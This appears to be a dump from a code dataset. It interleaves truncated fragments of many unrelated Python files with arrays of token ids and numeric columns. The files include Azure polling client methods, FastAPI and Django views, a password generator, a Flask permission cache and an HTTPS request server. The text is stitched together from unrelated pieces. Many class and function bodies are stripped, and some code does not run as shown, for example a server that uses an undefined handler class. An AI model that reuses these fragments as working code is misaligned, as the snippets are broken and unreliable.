            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
class LROsCustomHeaderOperations(object):
    """LROsCustomHeaderOperations operations.

    Operation group whose requests must all carry the message header
    ``x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0``
    (see the individual operation docstrings).

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
@distributed_trace
def begin_put_async_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
    """x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0 is required message header for
    all requests. Long running put request, service returns a 200 to the initial request, with an
    entity that contains ProvisioningState=’Creating’. Poll the endpoint indicated in the
    Azure-AsyncOperation header for operation status.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns JSON object
    :rtype: ~azure.core.polling.LROPoller[JSONType]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input;
            # the response body for status code 200 has the same shape.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. e.g. "Succeeded".
                },
                "tags": {"str": "str"},  # Optional. Dictionary of :code:`<string>`.
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial PUT and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._put_async_retry_succeeded_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialize the final response body (JSON) once polling completes;
        # an empty body maps to None.
        response = pipeline_response.http_response
        if response.content:
            deserialized = response.json()
        else:
            deserialized = None
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put201_creating_succeeded200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
    """x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0 is required message header for
    all requests. Long running put request, service returns a 201 to the initial request, with an
    entity that contains ProvisioningState=’Creating’. Polls return this value until the last poll
    returns a ‘200’ with ProvisioningState=’Succeeded’.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns JSON object
    :rtype: ~azure.core.polling.LROPoller[JSONType]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input;
            # the response body for status codes 200 and 201 has the same shape.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. e.g. "Succeeded".
                },
                "tags": {"str": "str"},  # Optional. Dictionary of :code:`<string>`.
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial PUT and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._put201_creating_succeeded200_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialize the final response body (JSON) once polling completes;
        # an empty body maps to None.
        response = pipeline_response.http_response
        if response.content:
            deserialized = response.json()
        else:
            deserialized = None
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_retry200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
    """x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0 is required message header for
    all requests. Long running post request, service returns a 202 to the initial request, with
    'Location' and 'Retry-After' headers, Polls return a 200 with a response body after success.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. e.g. "Succeeded".
                },
                "tags": {"str": "str"},  # Optional. Dictionary of :code:`<string>`.
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial POST and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._post202_retry200_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Final-deserialization callback invoked when polling completes. This
        # operation has no modeled return value, so only the optional ``cls``
        # response hook sees the final pipeline response.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
    """x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0 is required message header for
    all requests. Long running post request, service returns a 202 to the initial request, with an
    entity that contains ProvisioningState=’Creating’. Poll the endpoint indicated in the
    Azure-AsyncOperation header for operation status.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. e.g. "Succeeded".
                },
                "tags": {"str": "str"},  # Optional. Dictionary of :code:`<string>`.
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial POST and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._post_async_retry_succeeded_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Final-deserialization callback invoked when polling completes. This
        # operation has no modeled return value, so only the optional ``cls``
        # response hook sees the final pipeline response.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
| [
2,
279,
2645,
600,
25,
15560,
28,
18820,
12,
21834,
12,
6615,
198,
2,
19617,
28,
40477,
12,
23,
198,
2,
16529,
35937,
198,
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
... | 2.171319 | 130,295 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AssetFundInfo import AssetFundInfo
from alipay.aop.api.domain.AssetValidPeriod import AssetValidPeriod
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
11748,
33918,
198,
198,
6738,
435,
541,
323,
13,
64,
404,
13,
15042,
13,
9979,
415,
13,
22973,
34184,
1187,
1330,
163... | 2.752809 | 89 |
"""
Test cases for the regi0.verification.match function.
"""
import numpy as np
import pandas as pd
import pytest
from regi0.verification import match
@pytest.fixture
@pytest.fixture
| [
37811,
198,
14402,
2663,
329,
262,
842,
72,
15,
13,
332,
2649,
13,
15699,
2163,
13,
198,
37811,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
12972,
9288,
198,
198,
6738,
842,
72,
15,
13,
332,... | 3 | 64 |
import site
import tempfile
import urllib.request
import zipfile
# Direct PyPI download URL for the antspyx 0.3.2 wheel built for CPython 3.8
# on manylinux x86-64; consumed by code elsewhere in this file.
wheel_url = (
    'https://files.pythonhosted.org/packages/f0/b5'
    '/45f1d9ad34194bf4b9cc79c7b30b2d8c656ab6b487d8c70c8826f6a9f922'
    '/antspyx-0.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl'
)

# NOTE(review): main() is not defined in this view — presumably defined
# elsewhere in the file; confirm before running this module as a script.
if __name__ == '__main__':
    main()
| [
11748,
2524,
198,
11748,
20218,
7753,
198,
11748,
2956,
297,
571,
13,
25927,
198,
11748,
19974,
7753,
198,
198,
22001,
62,
6371,
796,
357,
198,
220,
220,
220,
705,
5450,
1378,
16624,
13,
29412,
4774,
276,
13,
2398,
14,
43789,
14,
69,
... | 1.933735 | 166 |
"""
====================
CMakeLists Generator
====================
:Date: 2021-01-26
:Version: 1.0.0
:Author: Ginoko
:Contact: ginorasakushisu666@gmail.com
"""
import sys
import os
import getopt
import platform
import re
import traceback
# Platform flag; presumably updated by check_platform() — TODO confirm.
is_windows = True

# NOTE(review): check_platform() and main() are not defined in this view —
# presumably defined elsewhere in the file.
if __name__ == '__main__':
    try:
        check_platform()
        main(sys.argv[1:])
    except Exception as e:
        # Print both the repr and the full traceback so failures are
        # diagnosable from the console.
        print("repr(e): %s" % repr(e))
        print("traceback.format_exc(): %s" % traceback.format_exc())
| [
37811,
198,
4770,
1421,
198,
34,
12050,
43,
1023,
35986,
198,
4770,
1421,
198,
198,
25,
10430,
25,
33448,
12,
486,
12,
2075,
198,
25,
14815,
25,
352,
13,
15,
13,
15,
198,
25,
13838,
25,
21444,
16044,
198,
25,
17829,
25,
39733,
410... | 2.528497 | 193 |
from typing import List
from fastapi import APIRouter, Depends, Body
from fastapi import UploadFile, File
from starlette.responses import Response
from models import ExternalContent
from routers import admin_only
from schemas import *
router = APIRouter()
@router.post("/browse", dependencies=[Depends(admin_only)])
@router.post("/read", dependencies=[Depends(admin_only)])
@router.post("/add", dependencies=[Depends(admin_only)])
@router.post("/edit", dependencies=[Depends(admin_only)])
@router.post("/delete", dependencies=[Depends(admin_only)])
| [
6738,
19720,
1330,
7343,
198,
198,
6738,
3049,
15042,
1330,
3486,
4663,
39605,
11,
2129,
2412,
11,
12290,
198,
6738,
3049,
15042,
1330,
36803,
8979,
11,
9220,
198,
6738,
3491,
21348,
13,
16733,
274,
1330,
18261,
198,
198,
6738,
4981,
13... | 3.267442 | 172 |
# Sum all numbers that can be written as the sum of the fifth powers of
# their digits (Project Euler style). Starting at 2 excludes the trivial
# single-digit cases 0 and 1.
result = sum(
    n
    for n in range(2, 200000)
    if n == sum(int(ch) ** 5 for ch in str(n))
)

print(result)
20274,
796,
657,
198,
1640,
1312,
287,
2837,
7,
17,
11,
939,
830,
2599,
198,
197,
12894,
896,
796,
1351,
7,
8899,
7,
600,
11,
965,
7,
72,
22305,
198,
197,
43556,
796,
657,
628,
197,
1640,
288,
287,
19561,
25,
198,
197,
197,
4355... | 2.382353 | 68 |
import unittest
from reverse_string import reverse
# Tests adapted from `problem-specifications//canonical-data.json` @ v1.0.1

# NOTE(review): the TestCase classes are not visible in this view; running
# this module executes them via unittest's test discovery.
if __name__ == '__main__':
    unittest.main()
| [
11748,
555,
715,
395,
198,
198,
6738,
9575,
62,
8841,
1330,
9575,
628,
198,
2,
30307,
16573,
422,
4600,
45573,
12,
16684,
6637,
1003,
49883,
605,
12,
7890,
13,
17752,
63,
2488,
410,
16,
13,
15,
13,
16,
628,
198,
361,
11593,
3672,
... | 2.934426 | 61 |
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.shortcuts import get_object_or_404
from campeonatos.models import Player
from campeonatos.models import Team
# Module-level callables for URLconf wiring, built from the class-based views.
# NOTE(review): PlayerListView / PlayerDetailView / PlayersByTeamListView are
# not defined in this view — presumably declared earlier in this module.
player_list_view = PlayerListView.as_view()
player_detail_view = PlayerDetailView.as_view()
players_by_team_list_view = PlayersByTeamListView.as_view()
| [
6738,
42625,
14208,
13,
33571,
13,
41357,
13,
4868,
1330,
7343,
7680,
198,
6738,
42625,
14208,
13,
33571,
13,
41357,
13,
49170,
1330,
42585,
7680,
198,
6738,
42625,
14208,
13,
19509,
23779,
1330,
651,
62,
15252,
62,
273,
62,
26429,
198,... | 3.25 | 116 |
class Astronomy(object):
    """
    Forecast information about the current astronomical conditions.

    Attributes:
        sunrise: Today's sunrise time. The time is local time and in the format
            h:mm am/pm
        sunset: Today's sunset time. The time is local time and in the format
            h:mm am/pm
    """
| [
198,
198,
4871,
25398,
9145,
7,
15252,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1114,
2701,
1321,
546,
262,
1459,
10894,
10179,
3403,
628,
220,
220,
220,
49213,
25,
198,
220,
220,
220,
220,
220,
220,
220,
40048,
25,
6288... | 2.688525 | 122 |
# Generated by Django 2.2.6 on 2019-11-13 19:22
from django.db import migrations, models
| [
2,
2980,
515,
416,
37770,
362,
13,
17,
13,
21,
319,
13130,
12,
1157,
12,
1485,
678,
25,
1828,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
628
] | 2.84375 | 32 |
import logging
from abc import ABCMeta, abstractmethod
import torch.nn as nn
from slowfast.utils.parser import load_config,parse_args
from slowfast.models import head_helper
class BaseRecognizer(nn.Module):
"""Base class for recognizers"""
__metaclass__ = ABCMeta
@property
@property
@abstractmethod
@abstractmethod
# def forward(self, num_modalities, img_meta, return_loss=True, **kwargs):
# num_modalities = int(num_modalities[0])
# if return_loss:
# return self.forward_train(num_modalities, img_meta, **kwargs)
# else:
# return self.forward_test(num_modalities, img_meta, **kwargs)
| [
11748,
18931,
198,
6738,
450,
66,
1330,
9738,
48526,
11,
12531,
24396,
198,
11748,
28034,
13,
20471,
355,
299,
77,
198,
198,
6738,
3105,
7217,
13,
26791,
13,
48610,
1330,
220,
3440,
62,
11250,
11,
29572,
62,
22046,
198,
6738,
3105,
72... | 2.621094 | 256 |
from bedlam import Animation
from bedlam import Button
from bedlam import Game
from bedlam import GameTask
from bedlam import ImageSprite
from bedlam import Scene
from bedlam import Sprite
# The __pragma__ comments below look like Transcrypt compiler directives —
# TODO confirm. The 'skip'/'noskip' pair makes the transpiler ignore the
# dummy assignment, which exists only so CPython linters see the browser
# globals defined. Do not reword these directive comments.
# __pragma__('skip')
document = window = Math = Date = console = 0 # Prevent complaints by optional static checker
# __pragma__('noskip')
# __pragma__('noalias', 'clear')
| [
6738,
3996,
2543,
1330,
23535,
198,
6738,
3996,
2543,
1330,
20969,
198,
6738,
3996,
2543,
1330,
3776,
198,
6738,
3996,
2543,
1330,
3776,
25714,
198,
6738,
3996,
2543,
1330,
7412,
38454,
578,
198,
6738,
3996,
2543,
1330,
28315,
198,
6738,
... | 3.440367 | 109 |
#
#Copyright Odin Solutions S.L. All Rights Reserved.
#
#SPDX-License-Identifier: Apache-2.0
#
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
import http.client
import logging
import sys
import json
import configparser
from subprocess import Popen, PIPE
import html
import os
import time
#Obtain configuracion from config.cfg file.
# Local listen address comes from config.cfg; external endpoints come from
# environment variables (container-friendly deployment).
cfg = configparser.ConfigParser()
cfg.read(["./config.cfg"])
host = cfg.get("GENERAL", "host")
port = int(cfg.get("GENERAL", "port"))
#keyrock_protocol = cfg.get("GENERAL", "keyrock_protocol")
#keyrock_host = cfg.get("GENERAL", "keyrock_host")
#keyrock_port = cfg.get("GENERAL", "keyrock_port")
# NOTE(review): os.getenv returns None when unset, so str() yields the
# literal string "None" and int() would raise TypeError — no validation here.
keyrock_protocol = str(os.getenv('keyrock_protocol'))
keyrock_host = str(os.getenv('keyrock_host'))
keyrock_port = int(os.getenv('keyrock_port'))
pdp_url = str(os.getenv('PDP_URL'))
logginKPI = cfg.get("GENERAL", "logginKPI")
# Unverified client-side TLS context (no file in this chunk uses it — verify).
gcontext = ssl.SSLContext()
logPath="./"
fileName="out"
# Log simultaneously to ./out.log and stdout.
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s",
    handlers=[
        logging.FileHandler("{0}/{1}.log".format(logPath, fileName)),
        logging.StreamHandler(sys.stdout)
    ])
# NOTE(review): SimpleHTTPRequestHandler is neither imported nor defined in
# this chunk (only BaseHTTPRequestHandler is imported) — as shown this line
# raises NameError. A custom handler class was probably stripped; confirm
# against the full file before "fixing" the name.
httpd = HTTPServer( (host, port), SimpleHTTPRequestHandler )
# NOTE(review): ssl.wrap_socket is deprecated (removed in Python 3.12);
# SSLContext.wrap_socket is the supported replacement.
httpd.socket = ssl.wrap_socket (httpd.socket,
        keyfile="certs/server-priv-rsa.pem",
        certfile='certs/server-public-cert.pem',
        server_side = True)
# Blocks forever serving HTTPS requests.
httpd.serve_forever()
| [
2,
198,
2,
15269,
19758,
23555,
311,
13,
43,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
4303,
36227,
12,
34156,
12,
33234,
7483,
25,
24843,
12,
17,
13,
15,
198,
2,
198,
198,
6738,
2638,
13,
15388,
1330,
38288,
18497,
11,
7308,
4... | 2.527682 | 578 |
from django.contrib import admin
from modelapp.models import Data
# Register your models here.
# Expose the Data model in the Django admin using the default ModelAdmin.
admin.site.register(Data)
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
201,
198,
6738,
2746,
1324,
13,
27530,
1330,
6060,
201,
198,
201,
198,
2,
17296,
534,
4981,
994,
13,
201,
198,
201,
198,
28482,
13,
15654,
13,
30238,
7,
6601,
8
] | 3.25641 | 39 |
page_template = '''<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"/>
<style>
{css}
</style>
<title>{title}</title>
</head>
<body>
<div class="content">
<div class="sidenav">
<h3>Links</h3>
{links}
</div>
<div class="article">
<h1>{title}</h1>
{content}
</div>
</div>
</body>
</html>
'''
| [
7700,
62,
28243,
796,
705,
7061,
27,
0,
18227,
4177,
56,
11401,
27711,
29,
220,
198,
1279,
6494,
29,
220,
198,
220,
1279,
2256,
29,
220,
198,
220,
220,
1279,
28961,
34534,
316,
2625,
48504,
12,
23,
26700,
220,
198,
220,
220,
1279,
... | 1.793578 | 218 |
#-----------------------------------------------------------------------------
# Name: uvSenderService.py
# Purpose: Start the UltraGrid video client
#
# Author: Ladan Gharai
# Colin Perkins
#
# Created: 13 August 2004
# Copyright: (c) 2004 University of Southern California
# (c) 2004 University of Glasgow
#
# $Revision: 1.1 $
# $Date: 2007/11/08 09:48:58 $
#
#-----------------------------------------------------------------------------
import sys, os
try: import _winreg
except: pass
from AccessGrid.Types import Capability
from AccessGrid.AGService import AGService
from AccessGrid.AGParameter import ValueParameter, OptionSetParameter, RangeParameter, TextParameter
from AccessGrid import Platform
from AccessGrid.Platform.Config import AGTkConfig, UserConfig
from AccessGrid.NetworkLocation import MulticastNetworkLocation
if __name__ == '__main__':
from AccessGrid.AGService import AGServiceI, RunService
service = uvSenderService()
serviceI = AGServiceI(service)
RunService(service,serviceI,int(sys.argv[1]))
| [
2,
10097,
32501,
198,
2,
6530,
25,
220,
220,
220,
220,
220,
220,
220,
334,
85,
50,
2194,
16177,
13,
9078,
198,
2,
32039,
25,
220,
220,
220,
220,
7253,
262,
14563,
41339,
2008,
5456,
198,
2,
198,
2,
6434,
25,
220,
220,
220,
220,
... | 3.142061 | 359 |
"""This module contains an item representing a node port"""
import collections
import logging
from typing import Dict, Optional, Union
from ..node_ports_common import config, exceptions
# Module-level logger, named after this module.
log = logging.getLogger(__name__)

# Union of the JSON-compatible payload types a port may carry; None when unset.
DataItemValue = Optional[Union[int, float, bool, str, Dict[str, Union[int, str]]]]
# Base namedtuple whose field names come from the project-level
# config.DATA_ITEM_KEYS mapping (defined outside this chunk).
_DataItem = collections.namedtuple("_DataItem", config.DATA_ITEM_KEYS.keys())


class DataItem(_DataItem):
    """Encapsulates a Data Item and provides accessors functions"""
    # NOTE(review): only the docstring is visible here — the accessor methods
    # advertised above appear to have been stripped from this copy.
| [
37811,
1212,
8265,
4909,
281,
2378,
10200,
257,
10139,
2493,
37811,
201,
198,
201,
198,
11748,
17268,
201,
198,
11748,
18931,
201,
198,
6738,
19720,
1330,
360,
713,
11,
32233,
11,
4479,
201,
198,
201,
198,
6738,
11485,
17440,
62,
3742,
... | 3.164557 | 158 |
#!/usr/bin/env python3
import argparse
import os
import re
from .config import (
DISTCCD_PORT,
server_settings,
client_settings,
)
from .compiler import wrap_compiler
from .server import daemon
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
11748,
1822,
29572,
198,
11748,
28686,
198,
11748,
302,
198,
198,
6738,
764,
11250,
1330,
357,
198,
220,
220,
220,
220,
360,
8808,
4093,
35,
62,
15490,
11,
198,
220,
220,
22... | 2.75641 | 78 |
import random
# trunk-ignore(flake8/W605)
import secrets
import string

# Pool of candidate characters. Built from string constants instead of a
# hand-typed literal: the original pool accidentally omitted 'z'
# ("...stuvwxyl") — deriving it from string.ascii_letters fixes that.
# The original's bracket/backslash symbols are kept for compatibility.
PASSWORD_CHARS = string.ascii_letters + string.digits + "[]\\;./"


def generate_password(length):
    """Return a random password of *length* characters from PASSWORD_CHARS.

    Uses the `secrets` module rather than `random`: passwords are
    security-sensitive and need a cryptographically strong source.

    :param length: non-negative number of characters to generate
    :returns: the generated password string ("" when length == 0)
    """
    return "".join(secrets.choice(PASSWORD_CHARS) for _ in range(length))


if __name__ == "__main__":
    # Guarded so importing this module no longer prompts for input;
    # running it as a script behaves exactly as before.
    y = int(input("Enter the length of the password"))
    print("The generated password is ", generate_password(y))
| [
11748,
4738,
198,
198,
2,
21427,
12,
46430,
7,
47597,
23,
14,
54,
32417,
8,
198,
87,
796,
366,
24694,
32988,
17511,
23852,
42,
31288,
45,
3185,
48,
49,
2257,
52,
30133,
34278,
57,
39305,
4299,
456,
2926,
41582,
10295,
404,
80,
81,
... | 2.466667 | 120 |
# -*- coding: utf-8 -*-
"""
flask_chown.permission_manager_cached
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cached permission manager (based on redis)
:copyright: (c) 2018 by Matthias Riegler.
:license: APACHEv2, see LICENSE.md for more details.
"""
import logging
import json
from . import PermissionManager
import redis
logger = logging.getLogger(__name__)
class CachedPermissionManager(PermissionManager):
    """ Caches user groups in a redis datastore, optionally pass a timeout

    The `CachedPermissionManager` can be used as a drop in improvement for the
    `PermissionManager`. You can create an instance using::

        pm = CachedPermissionManager(redis_url="redis://localhost",
                                     timeout=3600)

    In this example, a timeout of one hour is set (60 minutes a 60 seconds)

    :param redis_url: Redis connection url
    :param timeout: Specify how long the groups should be cached (in seconds);
                    Set to 0 for no timeout
    """

    def __init__(
            self,
            *args,
            redis_url="redis://localhost",
            timeout=0,
            **kwargs):
        """ Init """
        super().__init__(*args, **kwargs)

        self.timeout = timeout

        # Connect to redis
        self._redis = redis.from_url(redis_url)

    def user_in_group(self, user, group):
        """ Return whether *user* belongs to *group*, answering from the
        redis cache when possible and falling back to the parent lookup.

        BUGFIX: this was decorated with ``@classmethod`` although it is an
        instance method (it reads ``self.redis`` / ``self._gen_json_pair``);
        under ``@classmethod`` the class object would be bound as ``self``
        and the property access would break. The decorator is removed.
        Also reuses the single GET result instead of querying redis twice.
        """
        # _gen_json_pair is presumably inherited from PermissionManager —
        # not visible in this chunk; verify against the base class.
        cached = self.redis.get(self._gen_json_pair(user, group))
        if cached is not None:
            # redis returns bytes; membership was stored as str(bool)
            return cached == b"True"
        return self._cache(user, group)

    def _cache(self, user, group):
        """ Compute membership via the parent class, store it in redis and
        return it. """
        result = super().user_in_group(user, group)
        key = self._gen_json_pair(user, group)

        # Cache in redis (the boolean is serialized by the redis client)
        self.redis.set(key, result)

        # Set timeout if requested
        if self.timeout > 0:
            self.redis.expire(key, self.timeout)

        return result

    @property
    def redis(self):
        """ Redis connection (read-only) """
        return self._redis

    @property
    def timeout(self):
        """ :returns: Caching timeout in seconds; 0 means cache forever """
        return self._timeout

    @timeout.setter
    def timeout(self, timeout):
        """ Sets the timeout; negative values are rejected and logged.

        NOTE(review): if the very first assignment is negative, ``_timeout``
        stays unset and a later read raises AttributeError — preserved
        behaviour, but worth revisiting.
        """
        if timeout >= 0:
            self._timeout = timeout
        else:
            logger.error("{} is not a valid timeout value".format(timeout))
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
220,
220,
220,
42903,
62,
354,
593,
13,
525,
3411,
62,
37153,
62,
66,
2317,
198,
220,
220,
220,
220,
27156,
27156,
8728,
93,
628,
220,
220,
220,
327,
231... | 2.358999 | 1,039 |
# -*- coding: utf-8 -*-
import pandas as pd
from pandas import DataFrame,Series
# Empty placeholder Series, one per conceptual column of the ion table.
Cátions = pd.Series([])
Ânions = pd.Series([])
NomedoÍon = pd.Series([])
FórmuladoÍon = pd.Series([])

# Assemble the two ion-charge columns into a single (still empty) table;
# the name/formula series are kept around but not yet part of the frame.
_colunas = {'Cátions': Cátions, 'Ânions': Ânions}
df = DataFrame(_colunas)
df
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
628,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
19798,
292,
1330,
6060,
19778,
11,
27996,
628,
198,
34,
6557,
45240,
28,
30094,
13,
27996,
26933,
12962,
198,
5523,... | 2.238095 | 105 |
